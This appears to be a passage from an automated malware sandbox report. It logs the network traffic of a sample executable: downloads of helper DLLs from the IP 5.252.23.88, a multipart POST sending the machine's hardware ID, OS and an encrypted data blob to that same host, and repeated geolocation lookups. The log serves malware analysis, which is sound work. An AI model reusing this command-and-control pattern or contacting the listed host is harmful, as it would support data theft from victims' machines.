00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#4gZgZgZnsZ[eZBcZYjZ_mZ^lZE[oZ[dZg[Z^mZZfZfZXfZRichgZPELb["!w@@=Tp}pT@.text `.rdataRT@@.datatG`"B@.rsrcpd@@.reloc}~h@B
Mar 29, 2022 06:51:55.079188108 CEST	4118	OUT	GET /softokn3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 5.252.23.88 Connection: Keep-Alive
Mar 29, 2022 06:51:55.108997107 CEST	4119	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 29 Mar 2022 04:51:55 GMT Content-Type: application/x-msdos-program Content-Length: 144848 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "235d0-57aa1f0b0df80" Expires: Wed, 30 Mar 2022 04:51:55 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$l$JOJOJOuOJO?oKNJO?oINJO?oONJO?oNNJOmKNJO-nKNJOKO~JO-nNNJO-nJNJO-nOJO-nHNJORichJOPELb["!bP@0x@`T(@l.text `.rdataDF@@.data @.rsrcx0@@.reloc`@@B
Mar 29, 2022 06:51:56.061841965 CEST	4274	OUT	GET /vcruntime140.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 5.252.23.88 Connection: Keep-Alive
Mar 29, 2022 06:51:56.092242002 CEST	4276	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 29 Mar 2022 04:51:56 GMT Content-Type: application/x-msdos-program Content-Length: 83784 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "14748-57aa1f0b0df80" Expires: Wed, 30 Mar 2022 04:51:56 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NEEE"GL^NElUVA_D2DDRichEPEL8'Y"! @@A H?08@.text `.dataD@.idata@@.rsrc @@.reloc0@B
Mar 29, 2022 06:52:25.789918900 CEST	11251	OUT	POST / HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 81050 Host: 5.252.23.88 Connection: Keep-Alive Cache-Control: no-cache
Mar 29, 2022 06:52:25.790513039 CEST	11266	OUT	Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 64 30 36 65 64 36 33 35 2d 36 38 66 Data Ascii: --1BEF0A57BE110FD467AContent-Disposition: form-data; name="hwid"d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963--1BEF0A57BE110FD467AContent-Disposition: form-data; name="os"Windows 10 Pro--1BEF0A57BE110FD467AContent-Disposition: fo
Mar 29, 2022 06:52:25.820200920 CEST	11270	OUT	Data Raw: d7 81 f4 87 c2 e8 f3 1f f7 14 59 1c e3 6d 69 ec a3 c0 bb d8 2f 46 f6 25 8f c8 be f7 d1 6e e9 cc 42 4c bb 48 af 11 7a 73 f6 ac bb f0 74 3b 1c 3e a3 12 b4 11 6c eb 91 f8 5b 6f ae cd 24 c1 b9 db 8b 56 9f db d4 67 20 f0 71 30 b7 e9 68 9c be 0f 73 07 Data Ascii: Ymi/F%nBLHzst;>l[o$Vg q0hsQu8+ssTqB)[!(`R-HSTf=1K<s=^.V'7\|~W3--)DI}\ToiTMPY3v'b;R' >H
Mar 29, 2022 06:52:25.820234060 CEST	11275	OUT	Data Raw: 57 01 50 45 90 14 a5 a0 2e 1f 5c 9e 2e b2 ae 72 fa b0 e0 7c cb 3f dd 8d 7a 7a 75 a5 df 56 ff 12 e4 64 60 a7 c8 7a db 5e 5c ca 37 66 bf 9c ec 39 96 59 37 bd 4e b8 a8 11 06 7a 93 c6 ce 73 4e 0c cd 6f d6 7c c9 3c ae b8 a8 fa e8 4b 54 e8 42 f5 df c7 Data Ascii: WPE.\.r\|?zzuVd`z^\7f9Y7NzsNo\|<KTBni"&zU-}Ok\|-c\|tol&AFw%&.QgHs-IO}>&\|SfrS+\|{"b[WzHfN\x>;OvkX6uN}F^w(
Mar 29, 2022 06:52:25.821408987 CEST	11288	OUT	Data Raw: 37 25 10 e6 3f ab 38 2a 27 33 b4 a5 47 1e 0b 6c 5b db 59 f0 55 2e 8c 79 fe 1c 61 87 19 1e 49 44 07 80 08 18 92 d3 9e 6f 0e 61 5e d4 a4 0d f9 72 9f de c8 88 0d 52 f7 70 c7 d7 65 17 f2 b7 2a 20 7f da 37 b1 f7 e7 6b c8 a8 88 e1 80 85 09 94 4b 8f e1 Data Ascii: 7%?8'3Gl[YU.yaIDoa^rRpe 7kKqkY\;{n8Lxuc>C}][Gwzbzx$2Ly\|XS4WW7`dV%ALQ/3]mThy735gcj(.^edja$4
Mar 29, 2022 06:52:25.821445942 CEST	11296	OUT	Data Raw: 59 2b 7e d1 8f fc fd fd 69 7d c1 42 69 6d a6 73 ba 99 d9 31 92 ec fe cd 42 e5 79 bd 4d f6 43 f3 43 61 a3 1c 41 61 04 a9 58 8c 1a b1 4d 83 1a ff 4d 2c 38 b9 00 0f e9 1a 0c 5e 93 87 ca 17 59 e5 41 c0 3b d0 2c 64 87 3a ff 4d 02 cc c2 27 d6 cc e3 24 Data Ascii: Y+~i}Bims1ByMCCaAaXMM,8^YA;,d:M'$(N_>{E`:Dv?H>;3J@}PwdM%cfKp]n`Xn}RPe)77fe 5UiZ&7U5&xWf^g8$W-gH%
Mar 29, 2022 06:52:25.850300074 CEST	11301	OUT	Data Raw: 1b 11 16 9a 72 35 57 bf 69 2e 13 93 af 3f 0a 41 0a ef fd 81 dd 8e de d1 51 4f 10 ab 94 8c ba c6 54 7e e7 e1 d7 da bf cb c7 b6 9b a5 f4 1b 50 b1 f4 db 01 c5 83 1a 5c ba 67 5e 14 f3 35 39 88 61 83 bf a3 83 bc 5b b2 55 2e 9f 3a 73 72 bd a4 cd d1 b3 Data Ascii: r5Wi.?AQOT~P\g^59a[U.:srko}:xSc}+6T-sl;ukx&%Xn?\|Tm8oR6KH)9oRI~`ClW~vk[mo<^@9NZ,_s\|
Mar 29, 2022 06:52:25.850337982 CEST	11309	OUT	Data Raw: 7c 08 0d 2c ee 64 96 46 9f 3e 0f 9d 73 c9 87 b7 50 d0 a2 71 21 77 3c ae 53 0a 98 c9 33 38 52 e4 29 a6 64 e4 25 cc dc 83 26 e8 9c 97 4a 49 04 89 60 1e 9b d5 02 60 df 97 9e 7c 38 40 16 cd c1 7e 21 60 c7 07 02 8e c2 ad f7 ba bf 98 ed 86 34 23 0f 20 Data Ascii: \|,dF>sPq!w<S38R)d%&JI``\|8@~!`4# )=cE?xs46XOX8D#OqFWS~g06rx{pyfgd(vh\|,;@;q`#((;XRw[t}ps_3z
Mar 29, 2022 06:52:25.850410938 CEST	11315	OUT	Data Raw: f7 c7 c6 33 2b c6 58 63 c7 f5 f6 eb 22 14 52 bc 25 23 5d 08 ae 55 d0 ce 64 26 ae 92 12 19 73 58 19 eb 88 b4 e0 0c 29 92 73 19 29 2e 6d 09 56 18 d2 8a a1 14 25 50 c7 4c 99 0f 2b 93 6a 9b 43 07 50 a6 3a 87 a5 da 45 49 91 3d 00 c0 f6 d1 20 96 8c 2e Data Ascii: 3+Xc"R%#]Ud&sX)s).mV%PL+jCP:EI= .ilAbg{H1AKRK.^"wu]u~AcZEZ:iUIlHqlUH>Bmg1*QVm79E&a(}cEU"Y3KR"?{oa<s
Mar 29, 2022 06:52:25.851738930 CEST	11323	OUT	Data Raw: 05 55 0e 8c 34 9f 9c e9 65 6b 8c 38 e2 9b e5 1c 4f 69 06 bf 53 c8 23 4a 89 c9 53 ec c3 1a f7 39 fe e6 6c 55 a3 65 14 22 fd b4 66 8d 5e db 55 e3 67 54 7c ca db ae 8b 6b cd 21 0f 3f 7b f2 99 f6 5c 12 c2 66 99 5d aa 14 77 ff ed 41 52 26 7a 89 4b 04 Data Ascii: U4ek8OiS#JS9lUe"f^UgT\|k!?{\f]wAR&zK8/Fb>iTH%zx[mzXX>8ppQ]5)R) rR R$\6caGa{8D]`!wj'>2hPKAilGe8p
Mar 29, 2022 06:52:25.852260113 CEST	11331	OUT	Data Raw: 87 0c 00 64 b3 b0 06 80 1f 79 23 7d 1c bb a0 fe 53 f2 9c 86 c8 1f e9 f2 8c 64 bc f4 64 d3 e7 0a 31 33 01 a9 aa c6 37 06 67 6c ae 5f 61 4f f3 c9 fa 23 d7 53 b9 6b fa 5e 03 f6 d8 36 ae 01 ae f0 6f 7f b8 8a b8 74 16 71 59 ad b4 52 ef b2 97 7d 86 96 Data Ascii: dy#}Sdd137gl_aO#Sk^6otqYR}^:mIj} pkaIDeGS+^9?RfNaw\|z?iGC''{\8"caqKOL%,G1rNxG/?]J<bE
Mar 29, 2022 06:52:26.215430975 CEST	11332	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 29 Mar 2022 04:52:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip Data Raw: 31 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 cb cf 56 30 07 00 25 9d ba 2b 04 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 18V0%+0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49781	162.0.218.244	443	C:\Users\user\Desktop\Q5W0I0pzFI.exe

Timestamp	Direction	Data
2022-03-29 04:51:13 UTC	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2022-03-29 04:51:13 UTC	IN	HTTP/1.1 429 Too Many Requests Date: Tue, 29 Mar 2022 04:51:13 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2022-03-29 04:51:13 UTC	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49782	162.0.218.244	443	C:\Users\user\Desktop\Q5W0I0pzFI.exe

Timestamp	kBytes transferred	Direction	Data
2022-03-29 04:51:26 UTC	1	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2022-03-29 04:51:26 UTC	1	IN	HTTP/1.1 429 Too Many Requests Date: Tue, 29 Mar 2022 04:51:26 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2022-03-29 04:51:26 UTC	1	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49789	162.0.218.244	443	C:\Users\user\Desktop\Q5W0I0pzFI.exe

Timestamp	kBytes transferred	Direction	Data
2022-03-29 04:51:36 UTC	2	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2022-03-29 04:51:36 UTC	2	IN	HTTP/1.1 429 Too Many Requests Date: Tue, 29 Mar 2022 04:51:36 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2022-03-29 04:51:36 UTC	2	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.7	49790	162.0.218.244	443	C:\Users\user\Desktop\Q5W0I0pzFI.exe

Timestamp	kBytes transferred	Direction	Data
2022-03-29 04:51:43 UTC	3	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2022-03-29 04:51:43 UTC	3	IN	HTTP/1.1 429 Too Many Requests Date: Tue, 29 Mar 2022 04:51:43 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2022-03-29 04:51:43 UTC	4	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.7	49791	162.0.218.244	443	C:\Users\user\Desktop\Q5W0I0pzFI.exe

Timestamp	kBytes transferred	Direction	Data
2022-03-29 04:51:48 UTC	4	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
